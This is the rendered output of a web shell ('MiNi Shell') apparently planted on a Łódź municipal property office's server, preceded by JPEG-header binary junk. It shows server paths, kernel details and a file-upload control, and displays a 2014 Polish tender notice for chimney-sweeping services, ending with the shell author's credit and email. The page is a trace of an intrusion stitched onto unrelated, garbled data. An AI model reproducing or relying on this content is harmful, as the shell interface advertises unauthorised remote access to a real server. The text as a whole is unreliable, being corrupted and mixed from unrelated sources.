JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140227/40747-N-2014.html

<p class="kh_header"><b>Łódź: Usługi kominiarskie obowiązkowe (wyciery i przeglądy przewodów kominowych) oraz nieobowiązkowe (dodatkowo zlecane) w nieruchomościach przynależnych do RON 3 (Gminnych, Skarbu Państwa) administrowanych przez Zamawiającego.</b><br>
<b>Numer ogłoszenia: 40747 - 2014; data zamieszczenia: 27.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Zasobów Komunalnych Łódź-Górna , ul. Lubelska 9/11, 93-129 Łódź, woj. łódzkie, tel. 42 684 52 19, faks 42 684 52 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gorna.azk.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi kominiarskie obowiązkowe (wyciery i przeglądy przewodów kominowych) oraz nieobowiązkowe (dodatkowo zlecane) w nieruchomościach przynależnych do RON 3 (Gminnych, Skarbu Państwa) administrowanych przez Zamawiającego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi kominiarskie świadczone w ramach tzw. usług kominiarskich 
     obowiązkowych (wyciery i przeglądy przewodów kominowych) - zgodnie z ustawą z dnia 
     07.07.1994 r. Prawo Budowlane (tekst jednolity  z 2010 r. Dz. U. nr 243 poz. 1623 ze zm.) 
     i nieobowiązkowych (dodatkowo zlecanych) w nieruchomościach przynależnych do RON 3  
     administrowanych przez Zamawiającego stanowiących własność Gminy i Skarbu Państwa - 
     zgodnie z wykazem nieruchomości.
2. Szczegółowy zakres czynności określony został w cenniku usług (formularzu cenowym) 
     
    stanowiącym załącznik nr 2 do SIWZ.
3. Wykaz nieruchomości określony został w załączniku nr 9 do SIWZ, który obejmuje
     następujące ilości przewodów kominowych: 
    - przewody dymowe: 201 szt.
    - przewody wentylacyjne: 313 szt.

          Zamawiający nie dopuszcza składania ofert częściowych 

4. Zamawiający w przedmiocie zamówienia będzie wymagał od Wykonawcy:
a) opracowania i przedłożenia do akceptacji koordynatorowi RON-u  do dnia 31.03.2014 r., 
    harmonogramów dla obowiązkowych usług kominiarskich, w  zakresie: czyszczeń przewodów 
    kominowych i przeglądów rocznych przewodów kominowych w nieruchomościach; 
b) wykonywania obowiązkowych usług kominiarskich: czyszczeń  przewodów kominowych 
     w nieruchomościach na podstawie zaakceptowanego przez koordynatora RON- u 
     harmonogramu opracowanego przez Wykonawcę - zgodnie z wykazem z częstotliwością:
     -  od palenisk opalanych paliwem stałym (przewody dymowe) - 4 x w roku,
     -  od palenisk opalanych paliwem płynnym i gazowym (przewody spalinowe) - 2 x w roku,
     -  przewody wentylacyjne 1 x w roku;
c) wykonywania obowiązkowych usług kominiarskich: przeglądów rocznych  przewodów 
     kominowych w nieruchomościach na podstawie zaakceptowanego przez koordynatora RON- u 
     harmonogramu opracowanego przez Wykonawcę  - zgodnie z wykazem nieruchomości (budynki 
     bez instalacji gazowej i z instalacją gazową) w zakresie: sporządzania faktycznej dokumentacji tj: 
     protokołów z kontroli i opinii kominiarskich z przeprowadzonych oględzin ze szczegółowym 
     rysunkiem graficznym usytuowania przewodów kominowych na rzucie dachu budynku z 
     zaznaczeniem rodzaju przewodu i podłączonymi do niego lokalami (z podaniem numerów lokali i 
     kondygnacji, na których są usytuowane te lokale);
d) wykonywania w terminie niezwłocznym usług kominiarskich nieobowiązkowych (dodatkowo 
     zlecanych) -  czynności określonych w zał. nr 2 do SIWZ na podstawie pisemnych zleceń 
     wystawionych przez służby Zamawiającego. 
  Wszystkie wymienione czynności usług kominiarskich Wykonawca będzie wykonywał przy 
   pomocy własnych pracowników oraz przy użyciu własnych materiałów i własnego sprzętu.

5.  W ramach zamówienia Wykonawca zobowiązany będzie do:
 a) przyjmowania zgłoszeń w przypadkach awaryjnych wymagających natychmiastowej interwencji  
     kominiarskiej po godzinach pracy Zamawiającego oraz w dni wolne od pracy;
 b) wywieszania w budynkach informacji, o terminach czyszczeń przewodów kominowych - zgodnie z 
     ustalonym harmonogramem;
 c) zachowania praw osób trzecich;
 d) ponoszenia pełnej odpowiedzialności za szkody powstałe w wyniku prowadzonych czynności usług 
     kominiarskich.   

6. Zamawiający w ramach zamówienia będzie wymagał od Wykonawcy:
 a) świadczenia usług kominiarskich  zgodnie z obowiązującymi przepisami ustawy 
     z dnia 07.07.1994 r. Prawo Budowlane (tekst jednolity  z 2010 r. Dz. U. nr 243 poz. 1623 ze zm.); 
 b) wykonywania usług kominiarskich przez osoby posiadające kwalifikacje i pod nadzorem osoby 
     posiadającej kwalifikacje min. mistrza w rzemiośle kominiarskim - zgodnie z art. 62 ust.6 pkt. 1 i 2 
     ustawy Prawo Budowlane; 
c) przestrzegania przepisów bezpieczeństwa i higieny pracy - zgodnie z zasadami bezpieczeństwa 
     i higieny pracy określonymi w Rozporządzeniu Ministra Infrastruktury z dnia 06.02.2003 r. 
     w sprawie Bezpieczeństwa i higieny pracy podczas wykonywania robót  budowlanych (Dz. U. 
     Nr 47 poz. 401);

d) sporządzania zestawień rozliczeniowych z otrzymanych zarejestrowanych zleceń za wykonane 
     czynności usługowe na podstawie faktycznie wykonanych czynności (ilości jednostek 
     miary) i cen jednostkowych (netto) w oparciu o cennik ryczałtowy cen jednostkowych (netto) 
     odrębnie, dla każdej nieruchomości..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.50.00-4, 71.31.54.00-3, 71.50.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, o których mowa 
     w art. 22 ust. 1 Ustawy, który dotyczy:
a)  posiadania wiedzy i doświadczenia,
    Zamawiający żąda od Wykonawcy udokumentowania wiedzy i doświadczenia poprzez wykazanie 
    w zał. nr 3 do SIWZ wykonanych usług lub usług w trakcie realizacji w okresie ostatnich 
    trzech lat przed upływem terminu składania ofert, a  jeżeli okres działalności jest krótszy - w tym 
    okresie, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia  z 
    podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, w ilości: minimum jednej usługi 
    w zakresie usług kominiarskich (trwającej minimum 12 miesięcy), o wartości brutto 
    co najmniej  do wysokości  składanej oferty oraz załączeniem dokumentów - dowodów 
    potwierdzających, że wykazane  przez Wykonawcę usługi zostały wykonane lub są 
    wykonywane należycie.
    Dla usług będących w trakcie realizacji należy załączyć kserokopie podpisanej umowy z 
    informacją potwierdzającą, że usługi są wykonywane należycie. Kwota podpisanej umowy nie    
    może być niższa niż wartość składanej oferty..   
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez
    Wykonawców dokumentów i oświadczeń, na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, o których mowa 
     w art. 22 ust. 1 Ustawy, który dotyczy:
 a) dysponowania potencjałem technicznym; 
     Zamawiający żąda wykazania w zał. nr 4 do SIWZ, że Wykonawca dysponuje 
     potencjałem technicznym (sprzętem) gwarantującym terminowe i jakościowo dobre wykonanie 
     usług -  zgodnie z wymogami technologicznymi dla prowadzenia usług kominiarskich,
     minimum: 1 szt. - kamera kominowa,  1 szt. - detektor tlenku węgla, 
                         1 szt. -  analizator spalin, 1 szt. - anemometr ciągowy.
     Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
     Wykonawców dokumentów i oświadczeń na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, o którym mowa  
     w art. 22 ust. 1 Ustawy, który dotyczy:
  a) dysponowania osobami zdolnymi do wykonania zamówienia;
      Zamawiający żąda od Wykonawcy wykazania w zał. nr 5 do SIWZ wykazu osób, które 
      będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych  za 
      kierowanie usługami kominiarskimi. Zamawiający wymaga, aby osoby, które będą uczestniczyć 
      w wykonywaniu zamówienia posiadały stosowne uprawnienia - kwalifikacje w zawodzie 
      kominiarskim (minimum 2 osoby):
       - 1 osoba  posiadająca uprawnienia mistrza w zawodzie kominiarskim oraz 1 osoba posiadająca  
         uprawnienia mistrza, czeladnika lub przyuczona w zawodzie kominiarskim wraz z załączeniem 
         dokumentów (uprawnień) tych osób.
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez
    Wykonawców dokumentów i oświadczeń, na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, o którym mowa 
     w art. 22 ust.1 Ustawy, który dotyczy:
 a) sytuacji ekonomicznej i finansowej;
     Zamawiający żąda od Wykonawcy,  posiadania ubezpieczenia od odpowiedzialności 
     cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na minimalną
     kwotę na sumę ubezpieczenia minimum na kwotę stanowiącą 100% ceny oferty (brutto).
     W celu potwierdzenia spełnienia wskazanego warunku Wykonawca przedstawia polisę wraz z 
     dowodem jej opłacenia lub inny dokument w sposób nie budzący wątpliwości potwierdzający    
     objęcie ochroną ubezpieczeniową. 
     Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
     Wykonawców dokumentów i oświadczeń, na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gorna.azk.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> AZK Łódż - Górna, 93-129 Łódź, ul. Lubelska 9/11, pokój 30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2014 godzina 10:00, miejsce: AZK Łódż - Górna, 93-129 Łódź, ul. Lubelska 9/11, pokój 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com